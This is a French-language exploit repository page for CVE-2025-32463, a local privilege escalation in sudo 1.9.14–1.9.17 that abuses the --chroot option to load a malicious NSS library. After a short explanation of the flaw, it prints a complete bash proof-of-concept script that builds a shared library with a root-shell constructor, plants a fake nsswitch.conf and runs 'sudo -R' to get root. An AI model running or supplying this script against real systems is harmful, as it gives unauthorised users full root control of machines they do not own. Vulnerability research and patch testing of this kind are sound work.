
Preuve de concept d'exploit pour CVE-2025-32463, une escalade de privilèges locale dans sudo 1.9.14-1.9.17 via une mauvaise configuration de chroot et l'injection malveillante de bibliothèque NSS.
--chroot Escalade de privilèges localeExploitDB ID: 52352
Ce dépôt documente une vulnérabilité critique d'escalade de privilèges locale (LPE) affectant les versions Sudo 1.9.14 – 1.9.17.
La vulnérabilité provient d'une implémentation défectueuse de l'option sudo -R (--chroot) et permet à un attaquant d'exécuter des commandes avec les privilèges root, même si cela n'est pas autorisé dans le fichier sudoers.
🔥 Résultat : Un utilisateur non autorisé → shell root
Le paramètre --chroot (-R) de Sudo permet à l'utilisateur d'exécuter des commandes dans un répertoire racine qu'il spécifie.
Cependant, en raison d'un changement apporté dans sudo 1.9.14 :
sudoers n'étant pas encore complètement vérifié,chroot() est effectué sur le répertoire spécifié par l'utilisateurCette situation permet à un attaquant, via un fichier factice qu'il a créé :
/etc/nsswitch.conf
de charger une bibliothèque NSS malveillante (libnss_*.so) avec les privilèges root.
nsswitch.conf est préparésudo -R <dir> <command> est effectué⚠️ À utiliser uniquement dans des environnements de formation et de test
#!/bin/bash
# sudo-chwoot.sh – PoC for CVE-2025-32463
set -e
STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
cd "$STAGE"
cat > woot1337.c <<'EOF'
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor))
void woot(void) {
setreuid(0,0);
setregid(0,0);
chdir("/");
execl("/bin/bash","/bin/bash",NULL);
}
EOF
mkdir -p woot/etc libnss_
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
cp /etc/group woot/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c
sudo -R woot woot